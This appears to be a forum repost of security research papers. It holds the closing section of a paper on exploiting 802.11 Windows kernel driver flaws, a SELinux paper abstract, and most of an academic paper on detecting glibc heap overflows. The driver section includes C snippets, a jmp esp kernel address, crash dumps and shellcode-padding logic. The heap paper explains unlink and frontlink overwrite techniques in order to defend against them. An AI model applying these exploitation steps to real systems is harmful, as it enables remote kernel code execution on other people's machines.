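   0x804f16eb = 0x800d7000 + 0x0041a6eb above. */
uint32_t rebase(uint32_t kernel_base, uint32_t offset)
{
    return kernel_base + offset;
}

/* The source MAC doubles as the first code executed after the jmp edi.
   Encode a short relative jump whose displacement hops from the end of
   the two-byte instruction into the first information element. */
void jumping_src_mac(unsigned char mac[6], signed char rel)
{
    mac[0] = 0xEB;                   /* jmp short rel8 */
    mac[1] = (unsigned char)rel;     /* attacker-chosen displacement */
    mac[2] = mac[3] = mac[4] = mac[5] = 0x90;   /* nop filler */
}
```

The displacement must account for the BSSID and sequence-control bytes that sit between the source address and the IE chain in the frame.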
The maximum MTU of 802.11b is over 2300 bytes, allowing for payloads of up to 1000 bytes without running into reliability issues. Since this exploit is sent to the broadcast address, all vulnerable clients within range of the attacker are exploited with a single frame. 5.3) NetGear For the next test, the authors chose NetGear's WG111v2 USB wireless adapter. The machine used in the D-Link exploit was reused for this test (Windows XP SP2). The latest version of the WG111v2.SYS driver (v5.1213.6.316) was installed, the beacon fuzzer was started, and the adapter was connected to the test system. After about ten seconds, the system crashed and another gorgeous blue screen appeared. DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If kernel debugger is available get stack backtrace. Arguments: Arg1: dfa6e83c, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: dfa6e83c, address which referenced memory ErrCode = 00000000 eax=80550000 ebx=825c700c ecx=00000005 edx=f30e0000 esi=82615000 edi=825c7012 eip=dfa6e83c esp=80550684 ebp=b90ddf78 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 dfa6e83c ?? ??? Resetting default scope LAST_CONTROL_TRANSFER: from dfa6e83c to 804e2158 FAILED_INSTRUCTION_ADDRESS: +ffffffffdfa6e83c dfa6e83c ?? ??? STACK_TEXT: 80550610 dfa6e83c badb0d00 f30e0000 0b9e1a2b nt!KiTrap0E+0x233 WARNING: Frame IP not in any known module. Following frames may be wrong. 
80550680 79e1538d 14c4f76f 8c1cec8e ea20f5b9 0xdfa6e83c 
80550684 14c4f76f 8c1cec8e ea20f5b9 63a92305 0x79e1538d 
80550688 8c1cec8e ea20f5b9 63a92305 115cab0c 0x14c4f76f 
8055068c ea20f5b9 63a92305 115cab0c c63e58cc 0x8c1cec8e 
80550690 63a92305 115cab0c c63e58cc 6d90e221 0xea20f5b9 
80550694 115cab0c c63e58cc 6d90e221 78d94283 0x63a92305 
80550698 c63e58cc 6d90e221 78d94283 2b828309 0x115cab0c 
8055069c 6d90e221 78d94283 2b828309 39d51a89 0xc63e58cc 
805506a0 78d94283 2b828309 39d51a89 0f8524ea 0x6d90e221 
805506a4 2b828309 39d51a89 0f8524ea c8f0583a 0x78d94283 
805506a8 39d51a89 0f8524ea c8f0583a 7e98cd49 0x2b828309 
805506ac 0f8524ea c8f0583a 7e98cd49 214b52ab 0x39d51a89 
805506b0 c8f0583a 7e98cd49 214b52ab 139ef137 0xf8524ea 
805506b4 7e98cd49 214b52ab 139ef137 a7693fa7 0xc8f0583a 
805506b8 214b52ab 139ef137 a7693fa7 dfad502f 0x7e98cd49 
805506bc 139ef137 a7693fa7 dfad502f 81212de6 0x214b52ab 
805506c0 a7693fa7 dfad502f 81212de6 c46a3b2e 0x139ef137 
805507c0 f74a1b57 825f1e40 00000000 829a87d8 0xa7693fa7 
805507f0 f74a2754 026e6f44 829a80e0 829a80e0 USBPORT!USBPORT_DoneTransfer+0x137 
80550828 f74a3f6a 829a8028 804e3579 829a8230 USBPORT!USBPORT_FlushDoneTransferList+0x16c 
80550854 f74b1fb0 829a8028 804e3579 829a8028 USBPORT!USBPORT_DpcWorker+0x224 
80550890 f74b2128 829a8028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e 
805508ac 804dc179 829a864c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166 
805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 
805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 

The crash indicates that not only did the fuzzer gain control of the driver's execution address, but the entire stack frame was smashed as well. The esp register points about a thousand bytes into the frame, and the bogus eip value falls inside another controlled area. 
kd> dd 80550684 
80550684 79e1538d 14c4f76f 8c1cec8e ea20f5b9 
80550694 63a92305 115cab0c c63e58cc 6d90e221 
kd> s 0x80550600 Lffff 0x3c 0xe8 0xa6 0xdf 
80550608 3c e8 a6 df 10 06 55 80-78 df 0d b9 3c e8 a6 df <.....U.x...<... 
80550614 3c e8 a6 df 00 0d db ba-00 00 0e f3 2b 1a 9e 0b <...........+... 
80550678 3c e8 a6 df 08 00 00 00-46 02 01 00 8d 53 e1 79 <.......F....S.y 
8055a524 3c e8 a6 df 02 00 00 00-00 00 00 00 3c e8 a6 df <...........<... 
8055a530 3c e8 a6 df 00 40 00 e1-00 00 00 00 00 00 00 00 <....@.......... 

Analyzing this bug took a lot more time than one might expect. Surprisingly, there is no single field or information element that triggers this flaw. Any series of information elements with a length greater than 1100 bytes will trigger the overflow if the SSID, Supported Rates, and Channel information elements are at the beginning. The driver will discard any frames where the IE chain is truncated or extends beyond the boundaries of the received frame. This was an annoyance, since a payload may be of arbitrary length and content and may not neatly fit into a 255-byte block of data (the maximum for a single IE). The solution was to treat the blob of padding and shellcode like a contiguous IE chain and pad the buffer based on the content and length of the frame. The exploit code would generate the buffer, then walk through the buffer as if it were a series of IEs, extending the very last IE via randomized padding. This results in a chain of garbage information elements which pass the driver's sanity checks and allows for clean exploitation. For this bug, the esp register was the only one pointing into controlled data. This introduced another problem -- before the vulnerable function returned, it modified stack variables and left parts of the frame corrupted. Although the area pointed to by esp was stable, a corrupted block exists just beyond it. 
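The IE-chain padding approach described above -- walking the blob as if it were a chain of information elements and extending the last one so the chain ends exactly at the frame boundary -- can be sketched as follows. This illustrates the idea only; it is not the Metasploit module's code.

```c
#include <assert.h>
#include <stddef.h>

/* Walk `buf` as an 802.11 IE chain (1-byte id, 1-byte length, then
   `length` bytes of data) and return how many padding bytes must be
   appended so the final IE's declared length lands exactly on the new
   buffer end, satisfying the driver's truncation checks. */
size_t ie_chain_padding(const unsigned char *buf, size_t len)
{
    size_t off = 0;
    while (off + 2 <= len) {
        size_t ie_end = off + 2 + buf[off + 1];
        if (ie_end > len)               /* last IE runs past the frame: */
            return ie_end - len;        /* pad until it fits exactly    */
        off = ie_end;
    }
    return (off < len) ? 1 : 0;         /* a lone id byte still needs a length byte */
}
```

The exploit appends this many (randomized-content) bytes after the shellcode, turning arbitrary payload bytes into a chain of garbage-but-well-formed IEs.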
To solve this, a tiny block of assembly code was added to the exploit that, when executed, would jump to the real payload by calculating an offset from the eax register. Finding a jmp esp instruction was as simple as running msfpescan on ntoskrnl.exe and adjusting it for the kernel base address. The address that was chosen for this version of ntoskrnl.exe was 0x804ed5cb (0x800d7000 + 0x004165cb). 

$ msfpescan ntoskrnl.exe -j esp 
[ntoskrnl.exe] 
0x004165cb jmp esp 

6) Conclusion 

Technology that can be used to help prevent the exploitation of user-mode vulnerabilities is now becoming commonplace on modern desktop platforms. This represents a marked improvement that should, in the long run, make the exploitation of many user-mode vulnerabilities much more difficult or even impossible. That being said, there is an apparent lack of equivalent technology that can help to prevent the exploitation of kernel-mode vulnerabilities. The public justification for this lack typically centers around the argument that kernel-mode vulnerabilities are difficult to exploit and are too few in number to actually warrant the integration of exploit prevention features. In actuality, sad though it may seem, the justification really boils down to a business cost issue. At present, kernel-mode vulnerabilities don't account for enough money in lost revenue to support the time investment needed to implement and test kernel-mode exploit prevention features. In the interest of helping to balance the business cost equation, the authors have described a process that can be used to identify and exploit 802.11 wireless device driver vulnerabilities on Windows. This process includes steps that can be taken to fuzz the different ways in which 802.11 device drivers process 802.11 packets. In certain cases, flaws may be detected in a particular device driver's processing of certain packets, such as Beacon requests and Probe responses. 
When these flaws are detected, exploits can be developed using the features that have been integrated into the 3.0 version of the Metasploit Framework, which help to streamline the process of transmitting crafted 802.11 packets in an effort to gain code execution. Through the description of this process, it is hoped that the reader will see that kernel-mode vulnerabilities can be just as easy to identify and exploit as user-mode vulnerabilities. Furthermore, it is hoped that this description will help to eliminate the false impression that all kernel-mode vulnerabilities are much more difficult to exploit (keeping in mind, of course, that there are indeed kernel-mode vulnerabilities that are difficult to exploit, just as there are user-mode vulnerabilities that are difficult to exploit). While an emphasis has been put upon 802.11 wireless device drivers, many different device drivers have the potential for exposing vulnerabilities. Looking toward the future, there are many different opportunities for research, both from an attack and a defense point of view. From an attack point of view, there's no shortage of interesting research topics. As it relates to 802.11 wireless device driver vulnerabilities, much more advanced 802.11 protocol fuzzers can be developed that are capable of reaching features exposed by all of the protocol client states rather than focusing on the unauthenticated and unassociated state. For device drivers in general, the development of fuzzers that attack the IOCTL interface exposed by device objects would provide good insight into a wide range of locally exposed vulnerabilities. Aside from techniques used to identify vulnerabilities, it is expected that the techniques used to actually take advantage of different types of kernel-mode vulnerabilities will continue to evolve and become more reliable. 
From a defense point of view, there is a definite need for research that is focused on making the exploitation of kernel-mode vulnerabilities either impossible or less reliable. It will be interesting to see what the future holds for kernel-mode vulnerabilities. 

Sursa: http://www.uninformed.org/?v=6&a=2&t=txt
  3. Secure computing: SELinux Michael Wikberg Helsinki University of Technology Michael.Wikberg@wikberg.fi Abstract Using mandatory access control greatly increases the security of an operating system. SELinux, which is an implementation of Linux Security Modules (LSM), implements several measures to prevent unauthorized system usage. The security architecture used is named Flask, and provides a clean separation of security policy and enforcement. This paper is an overview of the Flask architecture and the implementation in Linux. KEYWORDS: SELinux, MAC, Security, Kernel, Linux, LSM, TE, RBAC, MLS Download: www.tml.tkk.fi/Publications/C/25/papers/Wikberg_final.pdf
  4. Run-time Detection of Heap-based Overflows William Robertson, Christopher Kruegel, Darren Mutz, and Fredrik Valeur - University of California, Santa Barbara Abstract Buffer overflows belong to the most common class of attacks on today's Internet. Although stack-based variants are still by far more frequent and well-understood, heap-based overflows have recently gained more attention. Several real-world exploits have been published that corrupt heap management information and allow arbitrary code execution with the privileges of the victim process. This paper presents a technique that protects the heap management information and allows for run-time detection of heap-based overflows. We discuss the structure of these attacks and our proposed detection scheme that has been implemented as a patch to the GNU Lib C. We report the results of our experiments, which demonstrate the detection effectiveness and performance impact of our approach. In addition, we discuss different mechanisms to deploy the memory protection. Introduction Buffer overflow exploits belong to the most feared class of attacks on today's Internet. Since buffer overflow techniques have reached a broader audience, in part due to the Morris Internet worm [1] and the Phrack article by AlephOne [2], new vulnerabilities are being discovered and exploited on a regular basis. A recent survey [3] confirms that about 50% of vulnerabilities reported to CERT are buffer overflow related. The most common type of buffer overflow attack is based on stack corruption. This variant exploits the fact that the return addresses for procedure calls are stored together with local variables on the program's stack. Overflowing a local variable can thus overwrite a return address, redirecting program flow when the function returns. This potentially allows a malicious user to execute arbitrary code. Recently, however, buffer overflows that corrupt the heap have gained more attention. 
Several CERT advisories [4, 5] describe exploits that affect widely deployed programs. Heap-based overflows can be divided into two classes: One class [6] comprises attacks where the overflow of a buffer allocated on the heap directly alters the content of an adjacent memory block. The other class [7, 8] comprises exploits that alter management information used by the memory manager (i.e., the malloc and free functions). Most malloc implementations share the behavior of storing management information within the heap space itself. The central idea of the attack is to modify the management information in a way that will allow subsequent arbitrary memory overwrites. In this way, return addresses, linkage tables or application level data can be altered. Such an attack was first demonstrated by Solar Designer [9]. This paper introduces a technique that protects the management information of boundary-tag-based heap managers against malicious or accidental modification. The idea has been implemented in Doug Lea's malloc for GNU Lib C, version 2.3 [10], utilized by Linux and Hurd. It could, however, be easily extended to other systems such as various free BSD distributions. Using our modified C library, programs are protected against attacks that attempt to tamper with heap management information. It also helps to detect programming errors that accidentally overwrite memory chunks, although not as completely or verbosely as dedicated memory debuggers. Program recompilation is not required to enable this protection. Every application that is dynamically linked against Lib C is secured once our patch has been applied. 

Related Work 

Much research has been done on the prevention and detection of stack-based overflows. A well-known result is StackGuard [11], a compiler extension that inserts a `canary' word before each function return address on the stack. 
When executing a stack-based attack, the intruder attempts to overflow a local buffer allocated on the stack to alter the return address of the function that is currently executing. This might permit the attacker to redirect the flow of execution and take control of the running process. By inserting a canary word between the return address and the local variables, overflows that extend into the return address will also change this canary and thus, can be detected. There are different mechanisms to prevent an attacker from simply including the canary word in his overflow and rendering the protection ineffective. One solution is to choose a random canary value on process startup (i.e., on exec) that is infeasible to guess. Another solution uses a terminator canary that consists of four different bytes commonly utilized as string terminator characters in string manipulation library functions (such as strcpy). The idea is that the attacker is required to insert these characters in the string used to overflow the buffer to overwrite the canary and remain undetected. However, the string manipulation functions will stop when encountering a terminator character and thus, the return address remains intact. A similar idea is realized by StackShield [12]. Instead of inserting the canary into the stack, however, a second stack is kept that only stores copies of the return addresses. Before a procedure returns, the copy is compared to the original and any deviations lead to the abortion of the process. Stack-based overflows exploit the fact that management information (the function return address) and data (automatic variables and buffers) are stored together. StackGuard and StackShield are both approaches to enforcing the integrity of in-band management information on the stack. Our technique builds upon this idea and extends the protection to management information in the heap. 
Other solutions to prevent stack-based overflows are not enforced by the compiler but implemented as libraries. Libsafe and Libverify [13, 14] implement and override unsafe functions of the C library (such as strcpy, fscanf, getwd). The safe versions estimate a safe boundary for buffers on the stack at run-time and check this boundary before any write to a buffer is permitted. This prevents user input from overwriting the function return address. Another possibility is to make the stack segment non-executable [15]. Although this does not protect against the actual overflow and the modification of the return address, the solution is based on the observation that many exploits execute their malicious payload directly on the stack. This approach has the problem of potentially breaking legitimate uses such as functional programming languages that generate code during run-time and execute it on the stack. Also, gcc uses executable stacks as function trampolines for nested functions and Linux uses executable user stacks for signal handling. The solution to this problem is to detect legitimate uses and dynamically re-enable execution. However, this opens a window of vulnerability and is hard to do in a general way. Less work has been done on protecting heap memory. Non-executable heap extensions [16, 17] that operate similar to their non-executable stack cousins have been proposed. However, they do not prevent buffer overflows from occurring and an attacker can still modify heap management information or overwrite function pointers. They also suffer from breaking applications that dynamically generate and execute code in the heap. Systems that provide memory protection are memory debuggers, such as Valgrind [18] or Electric Fence [19]. These tools supervise memory access (read and write) and intercept memory management calls (e.g., malloc) to detect errors. These tools use an approach similar to ours in that they attempt to maintain the integrity of the utilized memory. 
However, a check is inserted on every memory access, while our approach only performs a check when allocating or deallocating memory chunks. Memory debuggers effectively prevent unauthorized memory access and stop heap-based buffer overflows. Yet, they also impose a serious performance penalty on the monitored programs, which often run an order of magnitude slower. This is not acceptable for most production systems. A recent posting on bugtraq pointed to an article [20] that discusses several techniques to protect stack and heap memory against overflows. The presented heap protection mechanism follows ideas similar to ours, as it aims at protecting heap management information. However, no details were provided and no implementation or evaluation of their technique exists. One possibility for preventing stack-based and heap-based overflows altogether is the use of type-safe languages such as Java. Alternatively, solutions have been proposed [21] that provide safe pointers for C. All these systems can only be attacked by exploiting vulnerabilities [22, 23] in the mechanisms that enforce the type safety (e.g., the bytecode verifier). Note, however, that safe C systems typically require new compilers and recompilation of all applications to be protected. 

Technique 

Heap Management in GNU Lib C (glibc) 

The C programming language provides no built-in facilities for performing common operations such as dynamic memory management, string manipulation or input/output. Instead, these facilities are defined in a standard library, which is compiled and linked with user applications. The GNU C library [10] is such a library that defines all library functions specified by the ISO C standard [24], as well as additional features specific to POSIX [25] and extensions specific to the GNU system [26]. Two kinds of memory allocation, static and automatic, are directly supported by the C programming language. Static allocation is used when a variable is declared as static or global. 
Each static or global variable defines one block of space of a fixed size. The space is allocated once, on program startup as part of the exec operation, and is never freed. Automatic allocation is used for automatic variables such as function arguments or local variables. The space for an automatic variable is automatically allocated on the stack when the compound statement containing the declaration is entered, and is freed when that compound statement is exited. A third important kind of memory allocation, dynamic allocation, is not supported by C variables but is available via glibc functions. Dynamic memory allocation is a technique in which programs determine during run-time where information should be stored. It is needed when the amount of memory required, or the lifetime of its use, depends on factors that are not known a priori. The two basic functions provided are one to dynamically allocate a block of memory (malloc), and one to return a previously allocated block to the system (free). Other routines (such as calloc, realloc) are then implemented on top of these two procedures. GNU Lib C uses Doug Lea's memory allocator dlmalloc [27] to implement the dynamic memory allocation functions. dlmalloc utilizes two core features, boundary tags and binning, to manage memory requests and releases on behalf of user programs. Memory management is based on `chunks,' memory blocks that consist of application usable regions and additional in-band management information. The in-band information, also called a boundary tag, is stored at the beginning of each chunk and holds the sizes of the current and the previous chunk. This allows for coalescing two bordering unused chunks into one larger chunk, minimizing the number of unusable small chunks that result from fragmentation. Also, all chunks can be traversed starting from any known chunk in either a forward or backward direction. 
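The bidirectional traversal enabled by boundary tags can be sketched with a simplified tag structure. This mirrors the idea described above only; dlmalloc's real header additionally packs status bits into the size field, and the prev_size field is only meaningful when the previous chunk is free.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

/* Simplified boundary tag: the previous chunk's size and this chunk's
   size (header included), stored at the start of every chunk. */
struct tag {
    size_t prev_size;
    size_t size;
};

/* Forward: the next chunk begins `size` bytes after this one. */
struct tag *next_chunk(struct tag *c)
{
    return (struct tag *)((char *)c + c->size);
}

/* Backward: the previous chunk began `prev_size` bytes earlier. */
struct tag *prev_chunk(struct tag *c)
{
    return (struct tag *)((char *)c - c->prev_size);
}
```

Because the sizes live in-band, next to application data, an overflowing write can rewrite them -- which is exactly what the attacks below rely on.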
Chunks that are currently not in use by the application (i.e., free chunks) are maintained in bins, grouped by size. Bins for sizes less than 512 bytes each hold chunks of exactly one size; for sizes equal to or greater than 512 bytes, the size ranges increase approximately logarithmically. Searches for available chunks are processed in smallest-first, best-fit order, starting at the appropriate bin for the memory size requested.

For unallocated chunks, the management information (boundary tag) includes two pointers for storing the chunk in a double linked list (called the free list) associated with each bin. These list pointers are called forward (fd) and back (bk). On 32-bit architectures, the management information always contains two 4-byte size-information fields (the chunk size and the previous chunk size). When the chunk is unallocated, it also contains two 4-byte pointers that are utilized to manipulate the double linked list of free chunks for the binning.

This basic algorithm is known to be very efficient. Although it is based upon a search mechanism to find best fits, the use of indexing techniques (i.e., binning) and the exploitation of special cases lead to average cases requiring only a few dozen instructions, depending on the machine and the allocation pattern. A number of heuristic improvements have also been incorporated into the memory management algorithm in addition to the main techniques. These include locality preservation, wilderness preservation, memory mapping, and caching [28].

Anatomy of a Heap Overflow Exploit

The use of in-band forward and back pointers to link available chunks in bins exposes glibc's memory management routines to a security vulnerability. If a malicious user is able to overflow a dynamically allocated block of memory, that user could overwrite the next contiguous chunk header in memory.
When the overflown chunk is unallocated, and thus in a bin's double linked list, the attacker can control the values of that chunk's forward and back pointers. Given this information, consider the unlink macro used by glibc shown below:

#define unlink(P, BK, FD) { \
[1]     FD = P->fd;         \
[2]     BK = P->bk;         \
[3]     FD->bk = BK;        \
[4]     BK->fd = FD;        \
}

Intended to remove a chunk from a bin's free list, the unlink routine can be subverted by a malicious user to write an arbitrary value to any address in memory. In the unlink macro shown above, the first parameter P points to the chunk that is about to be removed from the double linked list. The attacker has to store the address of a pointer (minus 12 bytes, as explained below) in the chunk's fd field and the value to be written in its bk field. At lines [1] and [2], these two fields are read and stored in the temporary variables FD and BK, respectively. At line [3], FD gets dereferenced and the address located at FD plus 12 bytes (the offset of the bk field within a boundary tag) is overwritten with the value stored in BK. This technique can be utilized, for example, to change an entry in the program's GOT (Global Offset Table) and redirect a function pointer to code of the attacker's choice.

A similar situation occurs with the frontlink macro (shown in Figure 1). The task of this macro is to store the chunk of size S, pointed to by P, at the appropriate position in the double linked list of the bin with index IDX. FD is initialized with a pointer to the start of the list of the appropriate bin at line [1]. The loop at line [2] searches the double linked list to find the first chunk that is larger than P, or the end of the list, by following consecutive forward pointers (at line [3]). Note that every list stores chunks ordered by increasing sizes to facilitate a fast smallest-first search in case of memory allocations.
When an attacker manages to overwrite the forward pointer of one of the traversed chunks with the address of a carefully crafted fake chunk, he could trick frontlink into leaving the loop (at line [2]) with FD pointing to this fake chunk.

#define frontlink(A, P, S, IDX, BK, FD) {             \
        ...                                           \
[1]     FD = start_of_bin(IDX);                       \
[2]     while ( FD != BK && S < chunksize(FD) ) {     \
[3]         FD = FD->fd;                              \
        }                                             \
[4]     BK = FD->bk;                                  \
        ...                                           \
[5]     FD->bk = BK->fd = P;                          \

Figure 1: frontlink Macro.

Next, the back pointer BK of that fake chunk would be read at line [4], and the integer located at BK plus 8 bytes (8 is the offset of the fd field within a boundary tag) would be overwritten with the address of the chunk P at line [5]. The attacker could store the address of a function pointer (minus 8 bytes) in the bk field of the fake chunk, and therefore trick frontlink into overwriting this function pointer with the address of the chunk P at line [5]. Although this macro does not allow arbitrary values to be written, the attacker may be able to store valid machine code at the address of P. This code would then be executed the next time the function pointed to by the overwritten integer is called.

Figure 2: Original memory chunk structure and memory layout.

A variation on the heap overflow exploit described above is also possible, involving the manipulation of a chunk's size field instead of its list pointers. An attacker can supply arbitrary values to an adjacent chunk's size field, similar to the manipulation of the list pointers. When the size field is accessed, for example during the coalescing of two unused chunks, the heap management routines can be tricked into considering an arbitrary location in memory, possibly under the attacker's control, as the next chunk. An attacker can set up a fake chunk header at this location in order to perform an attack as discussed above.
If an attacker is, for some reason, unable to write to the list pointers of an adjacent chunk header but is able to reach the adjacent chunk's size field, this attack represents a viable alternative.

Heap Integrity Detection

In order to protect the heap, our system makes several modifications to glibc's heap manager, both in the structure of individual chunks and in the management routines themselves.

Figure 3: Modified memory chunk structure and memory layout.

Figure 2 depicts the original structure of a memory chunk in glibc. The first element in protecting each chunk's management information is to prepend a canary to the chunk structure, as shown in Figure 3. An additional padding field, __pad0, is also added (dlmalloc requires the size of the header of a used chunk to be a power of two). The canary contains a checksum of the chunk header, seeded with a random value as described below.

The second necessary element of our heap protection system is a global checksum seed value, which is held in a static variable (called __heap_magic). This variable is initialized during process startup with a random value, which is then protected against further writes by a call to mprotect. This is in contrast to stack protection schemes [29] that rely on repetitive calls to mprotect; since we only require a single invocation during process startup, we do not suffer from the run-time performance loss associated with such schemes.

The final element of the heap protection system is to augment the heap management routines with code to manage and check each chunk's canary. Newly allocated chunks to be returned from malloc have their canary initialized to a checksum covering their memory location and size fields, seeded with the global value of __heap_magic. Note that the checksum function does not cover the list pointer fields for allocated chunks, since these fields are part of the chunk's user data section. The new chunk is then released to the application.
When a chunk is returned to the heap manager through a call to free, the chunk's canary is checked against the checksum calculation performed when the chunk was released to the application. If the stored value does not match the current calculation, a corruption of the management information is assumed. At this point, an alert is raised and the process is aborted. Otherwise, normal processing continues; the chunk is inserted into a bin and coalesced with bordering free chunks as necessary. Any free-list manipulations which take place during this process are prefaced with a check of the involved chunks' canary values. After the deallocated chunk has been inserted into the free list, its canary is updated with a checksum covering its memory location, size fields, and list pointers, again seeded with the value of __heap_magic.

The elements described above prevent undetected writes to arbitrary locations in memory via modified chunk header fields, whether the modification occurs through an overflow into, or through direct manipulation of, the chunk header fields. Each allocated chunk is protected by a randomly-seeded checksum over its memory location and size fields, and each free chunk is protected by a randomly-seeded checksum over its memory location, size fields, and list pointers. Each access of a list pointer is protected by a check to ensure that the integrity of the pointers has not been violated. Also, each use of the size field is protected. Furthermore, the checksum seed has been protected against malicious writes to guarantee that it cannot be overwritten with a value chosen by the attacker.

As a beneficial side effect, common programming errors such as unintended heap overflows or double invocations of free are detected by this system as well. A double call to free refers to the situation where a programmer mistakenly attempts to deallocate the same chunk twice. This error is detected due to a checksum mismatch.
When the chunk is deallocated for the first time, its canary is updated to a new value reflecting its position on the free list. When the second call to free is executed, the checksum is verified again, under the assumption that the chunk is still allocated. Since the canary has been updated in the meantime, the check fails and an alarm is raised.

A limitation of our approach is the fact that we do not address general pointer corruption attacks, such as subversion of an application's function pointers. The system does not guarantee the integrity of user data contained within chunks in the heap; rather, it guarantees only that the chunk headers themselves are valid.

It is also worth noting that the heap implementation included with glibc already contains functionality that attempts to ensure the integrity of the heap management information for debugging purposes. However, use of the debugging routines incurs significant cost in a production environment. The routines perform a full scan of the heap's free lists and global state during each execution of a heap management function, and include checks unrelated to heap pointer exploitation. Furthermore, there is no guarantee that all attacks are detected. Not all list manipulations are checked, and malicious values could pass integrity checks that are not specifically intended to protect against malicious overflows. Thus, we conclude that the included debugging functionality is not suitable for protecting against the vulnerabilities that we address.

The system described above has been implemented for glibc 2.3 and for glibc 2.2.9x, the pre-release versions of glibc 2.3 utilized by RedHat 8.0. However, the techniques developed for glibc are easily adaptable to other heap designs, including those shipped with the various BSD derivatives or commercial Unix implementations. Thus, further work is planned to apply this technique to other popular open systems besides glibc.
Evaluation

The purpose of this section is to experimentally verify the effectiveness of our heap protection technique. We also discuss the performance impact of our proposed extension and its stability.

To assess the ability of our protection scheme, we obtained several real-world exploits that perform heap overflow attacks against vulnerable programs. These were the WU-Ftpd File Globbing Heap Corruption Vulnerability [30] against wuftpd 2.6.0, the Sudo Password Prompt Heap Overflow Vulnerability [31] against sudo 1.6.3, and the CVS Directory Request Double Free Heap Corruption Vulnerability [32] against cvs 1.11.4. In addition, we used two proof-of-concept programs presented in [8] that demonstrate the exploit techniques using the unlink and the frontlink macro, respectively. We also developed a variant of the unlink exploit to demonstrate that dlmalloc's debugging routines can be easily evaded and do not provide protection comparable to our technique.

All vulnerable programs were run under RedHat Linux 8.0. The exploits have been executed three times: once with the default C library (i.e., glibc 2.2.93), once with the patched library including our heap integrity code, and once with the default C library with debugging enabled. The third run was performed to determine the effectiveness of the built-in debugging mechanisms in detecting heap-based overflows.

Table 1 shows the results of our experiments. A column entry of 'shell' indicates that an exploit was successful and provided an interactive shell with the credentials of the vulnerable process. A 'segfault' entry indicates that the exploit successfully corrupted the heap, but failed to run arbitrary code (note that it might still be possible to change the exploit to gain elevated privileges). 'aborted' means that the memory corruption has been successfully detected and the process has been terminated.
The results show that our technique was successful in detecting all corruptions of in-band management information, and safely terminated the processes. Note that the built-in debugging support is also relatively effective in detecting inconsistencies; however, it does not offer complete protection and imposes a significantly higher performance penalty than our patch.

[TABLE]
[TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [TD]glibc + debugging[/TD] [/TR]
[TR] [TD]WU-Ftpd[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR]
[TR] [TD]Sudo[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR]
[TR] [TD]CVS[/TD] [TD]segfault[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR]
[TR] [TD]unlink[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR]
[TR] [TD]frontlink[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR]
[TR] [TD]debug evade[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]shell[/TD] [/TR]
[/TABLE]

Table 1: Detection effectiveness.

[TABLE]
[TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [TD]glibc + debugging[/TD] [/TR]
[TR] [TD]Loop[/TD] [TD]1,587[/TD] [TD]2,033 (+ 28%)[/TD] [TD]2,621 (+ 65%)[/TD] [/TR]
[TR] [TD]AIM 9[/TD] [TD]5,094[/TD] [TD]5,338 (+ 5%)[/TD] [TD]7,603 (+ 49%)[/TD] [/TR]
[/TABLE]

Table 2: Micro-Benchmarks.

The performance impact of our scheme has been measured using several micro- and macro-benchmarks. We are aware that the memory management routines are an important part of almost all applications and, therefore, that it is necessary to implement them efficiently. Our protection approach clearly incurs a certain amount of overhead, but we claim that this overhead is tolerable for most real-world applications and is easily compensated for by the increase in security.
To get a baseline for the worst slowdown that can be expected, we wrote a simple micro-benchmark that allocates and frees around four million (to be more precise, 2^22) objects of random sizes between 0 and 1024 bytes in a tight loop. The maximum size of 1024 was chosen to obtain a balanced distribution of objects in dedicated bins (for chunks with sizes less than 512 bytes) and objects in bins that cover a range of different sizes (for chunks with sizes greater than or equal to 512 bytes). We also utilized the dynamic memory benchmark present in the AIM 9 test suite [33]. Table 2 shows the average run-time in milliseconds over 100 iterations for the two micro-benchmarks. We provide results for a system with the default glibc, the glibc with heap protection, and the glibc with debugging.

For more realistic measurements that reflect the impact on real-world applications, we utilized Mindcraft's WebStone [34] and OSDB [35]. WebStone is a client-server benchmark for HTTP servers that issues a number of HTTP GET requests for specific pages on a Web server and measures the throughput and response latency of each HTTP transfer. OSDB (the open source database benchmark) evaluates the I/O throughput and general processing power of GNU/Linux systems. It is a test suite built on AS3AP, the ANSI SQL Scalable and Portable Benchmark, for evaluating the performance of database systems.

Figure 4 and Figure 5 show the throughput and the response latency measurements for an increasing number of HTTP clients in the WebStone benchmark, for both the default glibc and the patched version. We used an Intel Pentium 4 at 1.8 GHz with 1 GB RAM, Linux RedHat 8.0, and a 3COM 905C-TX NIC for the experiments, running Apache 2.0.40. It can be seen that even for a hundred simultaneous clients, virtually no performance impact was recorded. Similar results have been obtained for OSDB 0.15.1.
Table 3 below shows the measurements for 10 parallel clients that used our test machine (the same as above) to full capacity, running a PostgreSQL 7.2.3 database. The results show the total run-time in seconds for the single-user and multi-user tests.

We also attempted to assess the stability of the patched library over an extended period of time. For this purpose, the patch was installed on the lab's web server (running Apache 2.0.40) and CVS server (running cvs 1.11.60). A patched library was also used on two desktop machines, running RedHat 8.0 and Gentoo 1.4, respectively. Although the web server only receives a small number of requests, the CVS server is regularly used for our software development and the desktop machines are the workstations of two of the authors. All machines were stable and have been running without any problems for a period of several weeks.

Figure 4: HTTP client response time.

Figure 5: HTTP client throughput.

[TABLE]
[TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [/TR]
[TR] [TD]OSDB[/TD] [TD]6,015[/TD] [TD]6,070 (+ 0.91%)[/TD] [/TR]
[/TABLE]

